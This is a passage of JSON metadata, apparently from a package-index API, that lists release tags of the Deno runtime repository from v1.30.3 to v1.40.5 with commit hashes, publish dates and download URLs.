repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},